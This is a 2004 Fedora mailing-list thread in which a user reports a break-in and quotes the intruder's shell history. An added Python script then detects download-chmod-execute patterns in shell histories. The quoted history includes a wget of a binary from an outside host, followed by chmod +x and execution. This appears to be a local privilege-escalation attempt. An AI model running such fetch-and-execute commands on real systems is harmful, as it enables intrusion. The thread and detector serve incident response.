Vulnerability on FC3T2 ? Present in FC3 ?

Aaron Scott scott.aaron at abc.net.au
Mon Nov 22 04:57:23 UTC 2004


I really should add as well that the exploit mentioned is a local
exploit.  You need to be on the machine first as a local user before you
can execute it.  Maybe check the non-root user histories as well.  Maybe
someone has pinched your password.


On Mon, 2004-11-22 at 15:51 +1100, Aaron Scott wrote:

> And how does this prove that there is a vulnerability in Fedora and
> not that you have poor security?
> 
> According to the URLs you post, someone has installed a root kit.
> Unlucky.  But they had to get it there first.
> 
> You should first discover how they got onto your machine.  You will
> need to check a lot more logs than just wtmp.  Try secure and
> messages as well.  Maybe someone guessed your password.  I really
> hope that you have firewalled that IP range out to help prevent
> further trouble from that IP range (assuming though the hacker isn't
> bouncing from compromised machine to compromised machine).  Also, you
> might want to consider who has had or might have had physical access
> to your machine (if that is possible).
> 
> Pointing the finger at Fedora without real proof is pointless.
> 
> 
> On Mon, 2004-11-22 at 02:14 +0000, richard mullens wrote: 
> 
> > Someone logged into my system on 13 Nov 2004
> > I found the following in /var/log/wtmp
> > 
> > 207-36-180-20.prt.primarydns.com
> > demo.allegientsystems.com
> > 
> > My user password was changed - but not the root password - and the 
> > following commands had been executed:-
> > 
> > w
> > uname -a
> > cat /etc/issue
> > cd /tmp
> > wget chebeleu.com/local
> > chmod +x local
> > ./local -d -r
> > ./local -d -r
> > lunx
> > lynx
> > 
> > There is a similar report dated 10-Nov-2004 at 
> > http://episteme.arstechnica.com/eve/ubb.x?a=tpc&s=50009562&f=96509133&m=531005547631
> > where someone suggested it might be the exploit at 
> > http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
> > 
> > Anybody know any more ?
> > 
> 
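The history check suggested in this thread can be scripted. The following is an added example, not part of the original messages: it scans a user's shell history for the download, chmod, execute sequence seen in the quoted commands. The function names and the sample host are assumptions made for illustration, and shell history can be edited by whoever controlled the account, so a clean result proves nothing.

```python
import posixpath
import shlex

WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")

def downloaded_name(argv):
    """Best-effort local file name written by a wget/curl command line."""
    for flag in ("-O", "-o", "--output-document", "--output"):
        if flag in argv[:-1]:
            return posixpath.basename(argv[argv.index(flag) + 1])
    urls = [a for a in argv[1:] if not a.startswith("-")]
    return posixpath.basename(urls[-1].split("?")[0].rstrip("/")) if urls else None

def sets_exec_bit(mode):
    """True for symbolic modes containing x (+x, u+x) or octal modes with an odd digit."""
    return "x" in mode or (mode.isdigit() and any(d in "1357" for d in mode))

def find_drop_and_run(history):
    """Return files that were downloaded, made executable and then run, in that order."""
    cwd, staged = "~", {}
    for lineno, line in enumerate(history, 1):
        try:
            argv = shlex.split(line)
        except ValueError:
            continue  # unbalanced quotes in history: skip the line
        if not argv:
            continue
        name = posixpath.basename(argv[0])
        if name == "cd" and len(argv) > 1:
            new = argv[1] if argv[1].startswith(("/", "~")) else posixpath.join(cwd, argv[1])
            cwd = posixpath.normpath(new)
        elif name in ("wget", "curl"):
            target = downloaded_name(argv)
            if target:
                staged[target] = {"file": target, "dir": cwd, "download": lineno, "runs": []}
        elif name == "chmod" and len(argv) > 2 and sets_exec_bit(argv[1]):
            for path in argv[2:]:
                if posixpath.basename(path) in staged:
                    staged[posixpath.basename(path)]["chmod"] = lineno
        elif "/" in argv[0] and "chmod" in staged.get(name, {}):
            staged[name]["runs"].append(lineno)
    return [dict(e, world_writable=e["dir"] in WORLD_WRITABLE)
            for e in staged.values() if e["runs"]]

# Constructed sample shaped like the history quoted above; the host is a placeholder.
SAMPLE_HISTORY = ["w", "uname -a", "cat /etc/issue", "cd /tmp",
                  "wget files.example.invalid/local", "chmod +x local",
                  "./local -d -r", "./local -d -r", "lynx"]

if __name__ == "__main__":
    for hit in find_drop_and_run(SAMPLE_HISTORY):
        print(hit)
```

Feed it the lines of each account's history file, then correlate any hit with the login records in wtmp, secure and messages to find the session it belongs to.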